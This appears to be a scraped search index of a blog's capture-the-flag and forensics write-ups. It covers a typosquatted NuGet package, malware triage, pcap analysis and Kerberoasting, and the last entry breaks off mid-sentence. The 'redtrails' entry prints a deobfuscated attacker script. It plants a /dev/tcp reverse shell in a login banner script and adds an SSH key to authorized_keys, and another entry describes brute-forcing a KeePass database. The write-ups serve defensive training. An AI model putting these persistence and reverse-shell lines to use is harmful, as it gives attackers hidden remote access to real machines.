[{"content":"Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command) Review the PowerShell history file:\nConsoleHost_history.txt\nLook for commands related to NuGet package installation.\nIdentify the full command used to install the package.\nQ2: Identify the URL from which the package was downloaded ? Examine the web browsing history on the system.\nLocate the URL used to download the NuGet package.\nQ3: Who is the threat actor responsible for publishing the malicious package? (the name of the package publisher) Visit the NuGet package page and review its metadata.\nIdentify the package author/publisher.\nQ4: When did the attacker initiate the download of the package? Provide the timestamp in UTC format (YYYY-MM-DD HH:MM) Analyze Shellbags artifacts to determine folder access activity.\nExtract the timestamp and convert it to UTC.\nQ5: Despite restrictions, the attacker successfully uploaded the malicious file to the official site by altering one key detail. What is the modified package ID of the malicious package? Inspect the package contents and locate the .nuspec file.\nIdentify the modified package ID defined within.\nQ6: Which deceptive technique did the attacker employ during the initial access phase to manipulate user perception? (technique name) Analyze the package naming convention.\nA slight modification (e.g., removing a single character) was used to mimic a legitimate package.\nTechnique: Typosquatting\nQ7: Determine the full path of the file within the package containing the malicious code ? Navigate to the default NuGet package installation directory.\nLocate the file (e.g., init.ps1) containing the malicious code and record its full path.\nQ8: When tampering with the system\u0026rsquo;s security settings, what command did the attacker employ? Inspect the contents of the malicious script (e.g., init.ps1).\nIdentify the command(s) used to modify or disable security settings.\nQ9: Following the security settings alteration, the attacker downloaded a malicious file to ensure continued access to the system. Provide the SHA1 hash of this file Analyze the script to identify the downloaded file (e.g., uninstall.exe).\nSearch for this file in forensic tools such as Autopsy or security logs.\nCheck Windows Defender MP logs for the SHA1 hash.\nQ10: Identify the framework utilised by the malicious file for command and control communication. TBD\nQ11: At what precise moment was the malicious file executed? Analyze Prefetch files using tools such as:\nPECmd Timeline Explorer Export the timeline and search for the execution of the malicious binary (e.g., uninstall.exe).\nQ12: The attacker made a mistake and didn’t stop all the features of the security measures on the machine. When was the malicious file detected? Provide the timestamp in UTC. Check Windows Defender Operational logs for:\nEvent ID 1117\nSearch for references to the malicious file.\nExtract and convert the timestamp to UTC.\nQ13: After establishing a connection with the C2 server, what was the first action taken by the attacker to enumerate the environment? Provide the name of the process. Review the Prefetch timeline.\nIdentify processes executed shortly after the malicious binary.\nThe enumeration command can be identified from this sequence.\nQ14: To ensure continued access to the compromised machine, the attacker created a scheduled task. What is the name of the created task? Navigate to:\nC:\\Windows\\System32\\Tasks\nLook for unusual or suspicious scheduled tasks.\nIdentify the malicious task name.\nQ15: When was the scheduled task created? Provide the timestamp in UTC. Open the corresponding task XML file.\nLocate the creation timestamp and convert it to UTC.\nQ16: Upon concluding the intrusion, the attacker left behind a specific file on the compromised host. What is the name of this file? Search for unusual executables on disk (e.g., in C:\\ProgramData).\nAnalyze suspicious files using threat intelligence platforms.\nQ17: As an anti-forensics measure. The threat actor changed the file name after executing it. What is the new file name? Investigate file renaming activity using:\nTimeline analysis File system artifacts (e.g., MFT) Identify the renamed file.\nQ18: Identify the malware family associated with the file mentioned in the previous question (17). Use threat intelligence sources (e.g., VirusTotal).\nCheck:\nDetection names Community analysis Identify the most consistent malware family classification.\nQ19: When was the file dropped onto the system? Provide the timestamp in UTC. Parse the Master File Table (MFT) using tools such as MFTECmd.\nLoad the timeline into Timeline Explorer and search for the file (e.g., Updater.exe).\nExtract the file creation timestamp and convert it to UTC.\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/nuts/","summary":"\u003ch1 id=\"q1-what-action-did-alex-take-to-integrate-the-purported-time-saving-package-into-the-deployment-process-provide-the-full-command\"\u003eQ1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)\u003c/h1\u003e\n\u003cp\u003eReview the PowerShell history file:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ccode\u003eConsoleHost_history.txt\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eLook for commands related to NuGet package installation.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"History\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/nuts/2024-09-22T22:56:27,889083437+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eIdentify the full command used to install the package.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-identify-the-url-from-which-the-package-was-downloaded-\"\u003eQ2: Identify the URL from which the package was downloaded ?\u003c/h1\u003e\n\u003cp\u003eExamine the \u003cstrong\u003eweb browsing history\u003c/strong\u003e on the system.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Url\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/nuts/2024-10-13T18_19_20,030404275+02_00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLocate the URL used to download the NuGet package.\u003c/p\u003e","title":"nuts"},{"content":"Introduction The flag is split into three parts. In this investigation, we were able to recover two parts. We start from a provided .pcap file.\n1st part The capture contains two HTTP frames. The second frame is large and contains interesting data.\nLoad the payload in CyberChef. Apply reverse and Base64 decode operations. After decoding, deobfuscate the bash script manually.\n#!/bin/bash lhJVXukWibAFfkv() { echo \u0026#39;bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.0.200/1337 0\u0026gt;\u0026amp;1\u0026#34;\u0026#39; \u0026gt; /etc/update-motd.d/00-header } x7KG0bvubT6dID2() { echo -e \u0026#34;\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35\u0026#34; \u0026gt;\u0026gt; ~/.ssh/authorized_keys } hL8FbEfp9L1261G() { lhJVXukWibAFfkv x7KG0bvubT6dID2 } hL8FbEfp9L1261G The script reveals the first flag embedded in an ssh-rsa key.\n1st Flag: Embedded in ssh-rsa key: HTB{r3d15_1n574nc35} 2nd part The RESP protocol in the capture was notable. Refer to the Redis protocol spec. Follow the TCP stream in Wireshark to locate the data at the end of the stream. ⚠️ The flag is case-sensitive. Ensure correct capitalization when capturing.\n2nd Flag: Extracted from the TCP stream. 3rd part Binwalk revealed an ELF file within the capture. VirusTotal confirmed it is malicious. 3rd Flag: TBD ","permalink":"https://mikehorn-git.github.io/writeups/htb/challenges/redtrails/","summary":"\u003ch1 id=\"introduction\"\u003eIntroduction\u003c/h1\u003e\n\u003cp\u003eThe flag is split into \u003cstrong\u003ethree parts\u003c/strong\u003e. In this investigation, we were able to recover \u003cstrong\u003etwo parts\u003c/strong\u003e. We start from a provided \u003ccode\u003e.pcap\u003c/code\u003e file.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"1st-part\"\u003e1st part\u003c/h1\u003e\n\u003cp\u003eThe capture contains \u003cstrong\u003etwo HTTP frames\u003c/strong\u003e. The second frame is large and contains interesting data.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eLoad the payload in \u003cstrong\u003eCyberChef\u003c/strong\u003e.\u003c/li\u003e\n\u003cli\u003eApply \u003cstrong\u003ereverse\u003c/strong\u003e and \u003cstrong\u003eBase64 decode\u003c/strong\u003e operations.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cimg alt=\"CyberChef\" loading=\"lazy\" src=\"/writeups/htb/challenges/redtrails/2024-10-08T21:38:10,624043836+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eAfter decoding, deobfuscate the \u003cstrong\u003ebash script\u003c/strong\u003e manually.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" class=\"chroma\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"cp\"\u003e#!/bin/bash\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003elhJVXukWibAFfkv\u003cspan class=\"o\"\u003e()\u003c/span\u003e \u003cspan class=\"o\"\u003e{\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nb\"\u003eecho\u003c/span\u003e \u003cspan class=\"s1\"\u003e\u0026#39;bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.0.200/1337 0\u0026gt;\u0026amp;1\u0026#34;\u0026#39;\u003c/span\u003e \u0026gt; /etc/update-motd.d/00-header\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ex7KG0bvubT6dID2\u003cspan class=\"o\"\u003e()\u003c/span\u003e \u003cspan class=\"o\"\u003e{\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e    \u003cspan class=\"nb\"\u003eecho\u003c/span\u003e -e \u003cspan class=\"s2\"\u003e\u0026#34;\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8Vkq9UTKMakAx2Zq+PnZNc6nYuEK3ZVXxH15bbUeB+elCb3JbVJyBfvAuZ0sonfAqZsyq9Jg6/KGtNsEmtVKXroPXhzFumTgg7Z1NvrUNvnqLIcfxTnP1+/4X284hp0bF2VbITb6oQKgzRdOs8GtOasKaK0k//2E5o0RKIEdrx0aL5HBOGPx0p8GrGe4kRKoAokGXwDVT22LlBylRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IfLMD/FQNy1B4DYhsY62O7o2xR0vxkBEp5UhBAX8gOTG0wjzrUHxmdUimXgiy39YVZaTJQwLBtzJS//YhkewyF/+CP0H7wIKIErlf5WFK5skLYO6uKVpx6akGXY8GADnPU3iPK/MtBC+RqWssdkGqFIA5xG2Fn+Klid9Obm1uXexJfYVjJMOfvuqtb6KcgLmi5uRkA6+x6jZtd2gYhCMgSZ0iM9RyY7k7K13tHXzEk7OciUmd5/Z7Yuolnt3ByX9a+IlSxaiOAD2iNJboNuUIxMH/9HNYKd6mlwUpovqFcGBqXizcF21bxNGoOE31Vfox2fq2qW30BDWtHrrYi76iLh02FerHEYHdQAAA08NfUHyCw0fVl/qt6bAgKSb02k691lcDAo5JpEEzNQpub0X8xJItrbw==HTB{r3d15_1n574nc35\u0026#34;\u003c/span\u003e \u0026gt;\u0026gt; ~/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\t\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehL8FbEfp9L1261G\u003cspan class=\"o\"\u003e()\u003c/span\u003e \u003cspan class=\"o\"\u003e{\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\tlhJVXukWibAFfkv\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\tx7KG0bvubT6dID2\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\u003cspan class=\"o\"\u003e}\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan class=\"line\"\u003e\u003cspan class=\"cl\"\u003ehL8FbEfp9L1261G\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThe script reveals the \u003cstrong\u003efirst flag\u003c/strong\u003e embedded in an \u003ccode\u003essh-rsa\u003c/code\u003e key.\u003c/p\u003e","title":"redtrails"},{"content":"Introduction We are provided with two files:\nA PCAP file A PHP file PCAP Analysis Start by analyzing the PCAP before fully deobfuscating support.php.\nFilter for HTTP POST requests:\nOnly 4 POST requests are present.\nFollow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:\n0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5\nThese strings will be used as input for the PHP deobfuscation.\nPHP Analysis The provided PHP script performs multiple layers of obfuscation:\nPattern extraction using $kh and $kf Base64 decoding XOR decryption using key 80e32263 Gzip decompression To analyze it:\nExecute the script locally or via an online PHP interpreter Replace $input_string with values extracted from the PCAP You can:\nManually replicate each decoding step Or automate the process using scripts / tools Deobfuscation Process Using the extracted POST data as input:\nRun it through the PHP function Recover the decoded payload The output is still encoded — decode it again (e.g., with CyberChef): This results in a downloadable file: KeePassXC Analysis The extracted file is a KeePass database.\nTo recover credentials:\nUse keepass4brute Use a common wordlist such as rockyou.txt After 21444 attempts, the correct password is found.\nYou can now open the database:\n","permalink":"https://mikehorn-git.github.io/writeups/htb/challenges/obscure/","summary":"\u003ch1 id=\"introduction\"\u003eIntroduction\u003c/h1\u003e\n\u003cp\u003eWe are provided with two files:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eA \u003cstrong\u003ePCAP file\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003eA \u003cstrong\u003ePHP file\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch1 id=\"pcap-analysis\"\u003ePCAP Analysis\u003c/h1\u003e\n\u003cp\u003eStart by analyzing the PCAP before fully deobfuscating \u003ccode\u003esupport.php\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eFilter for \u003cstrong\u003eHTTP POST\u003c/strong\u003e requests:\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"POST\" loading=\"lazy\" src=\"./assets/2024-09-28T23:17:53,862253486+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eOnly \u003cstrong\u003e4 POST requests\u003c/strong\u003e are present.\u003c/p\u003e\n\u003cp\u003eFollow the HTTP streams to inspect the payloads. You will observe obfuscated strings such as:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ccode\u003e0UlYyJHG87EJqEz66f8af44abea0QKxO/n6DAwXuGEoc5X9/H3HkMXv1Ih75Fx1NdSPRNDPUmHTy351039f4a7b5\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"STREAM\" loading=\"lazy\" src=\"./assets/2024-09-28T23:22:19,040121186+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eThese strings will be used as input for the PHP deobfuscation.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"php-analysis\"\u003ePHP Analysis\u003c/h1\u003e\n\u003cp\u003eThe provided PHP script performs multiple layers of obfuscation:\u003c/p\u003e","title":"obscure"},{"content":"Introduction Tools recommended by the author (important for this analysis):\nWhois VirusTotal MalwareBazaar ThreatFox Q1: Categorizing malware allows for a quicker and easier understanding of the malware, aiding in understanding its distinct behaviors and attack vectors. What\u0026rsquo;s the identified malware\u0026rsquo;s category? Submit the file hash to VirusTotal and review the main summary page.\nIdentify the malware category based on detection labels and classification.\nQ2: Clear identification of the malware file name facilitates better communication among the SOC team. What\u0026rsquo;s the file name associated with this malware? On the VirusTotal main/detection page, locate the file details.\nIdentify the file name associated with the malware.\nQ3: Knowing the exact time the malware was first seen can help prioritize actions. If the malware is newly detected, it may warrant more urgent containment and eradication efforts compared to older, well-known threats. Can you provide the UTC timestamp of first submission of this malware on VirusTotal? Navigate to the Detection tab in VirusTotal.\nLocate the first submission timestamp and ensure it is in UTC format.\nQ4: Understanding the techniques used by malware helps in strategic security planning. What is the MITRE ATT\u0026amp;CK technique ID for the malware\u0026rsquo;s data collection from the system before exfiltration? In VirusTotal, go to the MITRE ATT\u0026amp;CK section.\nNavigate to:\nCollection → Data from Local System\nIdentify the corresponding technique ID.\nQ5: Following execution, what domain name resolution is performed by the malware? In VirusTotal, review the DNS Resolutions section.\nIdentify the domain(s) queried by the malware.\nQ6: Once the malicious IP addresses are identified, network security devices such as firewalls can be configured to block traffic to and from these addresses. Can you provide the IP address and destination port the malware communicates with? In VirusTotal, check the IP Traffic section.\nIdentify:\nThe malicious IP address The destination port Q7: YARA rules are designed to identify specific malware patterns and behaviors. What\u0026rsquo;s the name of the YARA rule created by \u0026ldquo;Varp0s\u0026rdquo; that detects the identified malware? Search for the sample on MalwareBazaar using:\nsha256:\u0026lt;hash\u0026gt;\nNavigate to the YARA section.\nIdentify the YARA rule authored by Varp0s.\nQ8: Understanding which malware families are targeting the organization helps in strategic security planning for the future and prioritizing resources based on the threat. Can you provide the different malware alias associated with the malicious IP address? Use ThreatFox and search with:\nioc:\u0026lt;IP\u0026gt;\nIdentify the different malware aliases associated with the IP address.\nQ9: By identifying the malware\u0026rsquo;s imported DLLs, we can configure security tools to monitor for the loading or unusual usage of these specific DLLs. Can you provide the DLL utilized by the malware for privilege escalation? Return to VirusTotal and review the Imports section.\nIdentify the DLL associated with privilege escalation functions such as:\nAdjustTokenPrivileges GetTokenInformation LookupPrivilegeValueA ","permalink":"https://mikehorn-git.github.io/writeups/cyberdefenders/red_stealer/","summary":"\u003ch1 id=\"introduction\"\u003eIntroduction\u003c/h1\u003e\n\u003cp\u003eTools recommended by the author (important for this analysis):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eWhois\u003c/li\u003e\n\u003cli\u003eVirusTotal\u003c/li\u003e\n\u003cli\u003eMalwareBazaar\u003c/li\u003e\n\u003cli\u003eThreatFox\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch1 id=\"q1-categorizing-malware-allows-for-a-quicker-and-easier-understanding-of-the-malware-aiding-in-understanding-its-distinct-behaviors-and-attack-vectors-whats-the-identified-malwares-category\"\u003eQ1: Categorizing malware allows for a quicker and easier understanding of the malware, aiding in understanding its distinct behaviors and attack vectors. What\u0026rsquo;s the identified malware\u0026rsquo;s category?\u003c/h1\u003e\n\u003cp\u003eSubmit the file hash to \u003cstrong\u003eVirusTotal\u003c/strong\u003e and review the main summary page.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"MainPage\" loading=\"lazy\" src=\"/writeups/cyberdefenders/red_stealer/2024-09-28T16:05:54,875091188+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eIdentify the malware \u003cstrong\u003ecategory\u003c/strong\u003e based on detection labels and classification.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-clear-identification-of-the-malware-file-name-facilitates-better-communication-among-the-soc-team-whats-the-file-name-associated-with-this-malware\"\u003eQ2: Clear identification of the malware file name facilitates better communication among the SOC team. What\u0026rsquo;s the file name associated with this malware?\u003c/h1\u003e\n\u003cp\u003eOn the \u003cstrong\u003eVirusTotal\u003c/strong\u003e main/detection page, locate the file details.\u003c/p\u003e","title":"red stealer"},{"content":"Q1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command) Review the PowerShell history file:\nConsoleHost_history.txt\nLook for commands related to NuGet package installation.\nIdentify the full command used to install the package.\nQ2: Identify the URL from which the package was downloaded ? Examine the web browsing history on the system.\nLocate the URL used to download the NuGet package.\nQ3: Who is the threat actor responsible for publishing the malicious package? (the name of the package publisher) Visit the NuGet package page and review its metadata.\nIdentify the package author/publisher.\nQ4: When did the attacker initiate the download of the package? Provide the timestamp in UTC format (YYYY-MM-DD HH:MM) Analyze Shellbags artifacts to determine folder access activity.\nExtract the timestamp and convert it to UTC.\nQ5: Despite restrictions, the attacker successfully uploaded the malicious file to the official site by altering one key detail. What is the modified package ID of the malicious package? Inspect the package contents and locate the .nuspec file.\nIdentify the modified package ID defined within.\nQ6: Which deceptive technique did the attacker employ during the initial access phase to manipulate user perception? (technique name) Analyze the package naming convention.\nA slight modification (e.g., removing a single character) was used to mimic a legitimate package.\nTechnique: Typosquatting\nQ7: Determine the full path of the file within the package containing the malicious code ? Navigate to the default NuGet package installation directory.\nLocate the file (e.g., init.ps1) containing the malicious code and record its full path.\nQ8: When tampering with the system\u0026rsquo;s security settings, what command did the attacker employ? Inspect the contents of the malicious script (e.g., init.ps1).\nIdentify the command(s) used to modify or disable security settings.\nQ9: Following the security settings alteration, the attacker downloaded a malicious file to ensure continued access to the system. Provide the SHA1 hash of this file Analyze the script to identify the downloaded file (e.g., uninstall.exe).\nSearch for this file in forensic tools such as Autopsy or security logs.\nCheck Windows Defender MP logs for the SHA1 hash.\nQ10: Identify the framework utilised by the malicious file for command and control communication. Analyze the malicious binary using:\nStatic analysis tools Threat intelligence platforms (e.g., VirusTotal) Identify the C2 framework used by the malware.\nQ11: At what precise moment was the malicious file executed? Analyze Prefetch files using tools such as:\nPECmd Timeline Explorer Export the timeline and search for the execution of the malicious binary (e.g., uninstall.exe).\nQ12: The attacker made a mistake and didn’t stop all the features of the security measures on the machine. When was the malicious file detected? Provide the timestamp in UTC. Check Windows Defender Operational logs for:\nEvent ID 1117\nSearch for references to the malicious file.\nExtract and convert the timestamp to UTC.\nQ13: After establishing a connection with the C2 server, what was the first action taken by the attacker to enumerate the environment? Provide the name of the process. Review the Prefetch timeline.\nIdentify processes executed shortly after the malicious binary.\nThe enumeration command can be identified from this sequence.\nQ14: To ensure continued access to the compromised machine, the attacker created a scheduled task. What is the name of the created task? Navigate to:\nC:\\Windows\\System32\\Tasks\nLook for unusual or suspicious scheduled tasks.\nIdentify the malicious task name.\nQ15: When was the scheduled task created? Provide the timestamp in UTC. Open the corresponding task XML file.\nLocate the creation timestamp and convert it to UTC.\nQ16: Upon concluding the intrusion, the attacker left behind a specific file on the compromised host. What is the name of this file? Search for unusual executables on disk (e.g., in C:\\ProgramData).\nAnalyze suspicious files using threat intelligence platforms.\nQ17: As an anti-forensics measure. The threat actor changed the file name after executing it. What is the new file name? Investigate file renaming activity using:\nTimeline analysis File system artifacts (e.g., MFT) Identify the renamed file.\nQ18: Identify the malware family associated with the file mentioned in the previous question (17). Use threat intelligence sources (e.g., VirusTotal).\nCheck:\nDetection names Community analysis Identify the most consistent malware family classification.\nQ19: When was the file dropped onto the system? Provide the timestamp in UTC. Parse the Master File Table (MFT) using tools such as MFTECmd.\nLoad the timeline into Timeline Explorer and search for the file (e.g., Updater.exe).\nExtract the file creation timestamp and convert it to UTC.\n","permalink":"https://mikehorn-git.github.io/writeups/cyberdefenders/reveal/","summary":"\u003ch1 id=\"q1-what-action-did-alex-take-to-integrate-the-purported-time-saving-package-into-the-deployment-process-provide-the-full-command\"\u003eQ1: What action did Alex take to integrate the purported time-saving package into the deployment process? (provide the full command)\u003c/h1\u003e\n\u003cp\u003eReview the PowerShell history file:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ccode\u003eConsoleHost_history.txt\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eLook for commands related to NuGet package installation.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"History\" loading=\"lazy\" src=\"./2024-09-22T22:56:27,889083437+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eIdentify the full command used to install the package.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-identify-the-url-from-which-the-package-was-downloaded-\"\u003eQ2: Identify the URL from which the package was downloaded ?\u003c/h1\u003e\n\u003cp\u003eExamine the \u003cstrong\u003eweb browsing history\u003c/strong\u003e on the system.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Url\" loading=\"lazy\" src=\"./2024-10-13T18_19_20,030404275+02_00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLocate the URL used to download the NuGet package.\u003c/p\u003e","title":"reveal"},{"content":"Q1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash. Identify the SHA256 hash of the suspicious binary file.\nFile Name: Superstar_MemberCard.tiff.exe SHA256: 12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3\nQ2: When was the binary file originally created, according to its metadata (UTC)? Upload the file hash to VirusTotal to retrieve metadata information.\nLocate the first seen / creation timestamp and convert it to UTC.\nQ3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary? Use a tool such as readpe to inspect the binary structure.\nThis will provide details about the code section size within the executable.\nQ4: It appears that the binary may have undergone a file conversion process. Could you determine its original filename? Use the strings utility to extract readable content from the binary.\nSearch for references to script or executable names.\nYou should identify the original filename:\nnewILY.ps1\nQ5: Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary. Locate the obfuscated content within the binary.\nThen use hexdump to determine the exact hexadecimal offset where this content begins.\nQ6: The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation? From the extracted content, identify the encoding method used.\nThe encoding method is Base64\nQ7: What is the specific cmdlet utilized that was used to initiate file downloads? Decode the embedded script and analyze its contents.\nIdentify the PowerShell cmdlet used to download files:\nInvoke-WebRequest\nQ8: Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order. Inspect the decoded script for network indicators.\nYou should find IP addresses embedded in the payload (e.g., in specific lines of the script).\nList them in ascending order, separated by commas.\nQ9: The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored? In the decoded script, locate the variable defining the staging directory:\n$targetDir\nThis value specifies where collected files are stored.\nQ10: What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data? Refer to the MITRE ATT\u0026amp;CK framework.\nNavigate to:\nCollection → Automated Collection\nIdentify the corresponding MITRE Technique ID.\nQ11: What is the password utilized to exfiltrate the collected files through the file transfer program within the binary? Analyze the decoded script further.\nLocate the section where file transfer (e.g., SFTP) is configured.\nThe password used for exfiltration is defined alongside the connection details (e.g., near the second IP address).\n","permalink":"https://mikehorn-git.github.io/writeups/htb/sherlocks/heartbreaker-continuum/","summary":"\u003ch1 id=\"q1-to-accurately-reference-and-identify-the-suspicious-binary-please-provide-its-sha256-hash\"\u003eQ1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash.\u003c/h1\u003e\n\u003cp\u003eIdentify the SHA256 hash of the suspicious binary file.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003cstrong\u003eFile Name:\u003c/strong\u003e \u003ccode\u003eSuperstar_MemberCard.tiff.exe\u003c/code\u003e\n\u003cstrong\u003eSHA256:\u003c/strong\u003e \u003ccode\u003e12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003chr\u003e\n\u003ch1 id=\"q2-when-was-the-binary-file-originally-created-according-to-its-metadata-utc\"\u003eQ2: When was the binary file originally created, according to its metadata (UTC)?\u003c/h1\u003e\n\u003cp\u003eUpload the file hash to \u003cstrong\u003eVirusTotal\u003c/strong\u003e to retrieve metadata information.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"VT\" loading=\"lazy\" src=\"/writeups/htb/sherlocks/heartbreaker-continuum/2024-09-22T11:34:24,713072253+02:00.png\"\u003e\u003c/p\u003e\n\u003cp\u003eLocate the \u003cstrong\u003efirst seen / creation timestamp\u003c/strong\u003e and convert it to \u003cstrong\u003eUTC\u003c/strong\u003e.\u003c/p\u003e\n\u003chr\u003e\n\u003ch1 id=\"q3-examining-the-code-size-in-a-binary-file-can-give-indications-about-its-functionality-could-you-specify-the-byte-size-of-the-code-in-this-binary\"\u003eQ3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?\u003c/h1\u003e\n\u003cp\u003eUse a tool such as \u003cstrong\u003ereadpe\u003c/strong\u003e to inspect the binary structure.\u003c/p\u003e","title":"heartbreaker-continuum"},{"content":"Q1: Analyzing Domain Controller Security Logs Can you confirm the date and time when the Kerberoasting activity occurred?\nOpen Event Viewer on the Windows VM and search for Event ID 4769.\n🕒 Remember to convert your local time to UTC.\nQ2: Targeted Service Name What is the Service Name that was targeted?\nCheck the \u0026ldquo;Service Information\u0026rdquo; section of the same event:\nQ3: Workstation Identification Identify the Workstation IP Address from which the activity originated.\nIn the same event, look under Network Information → Client 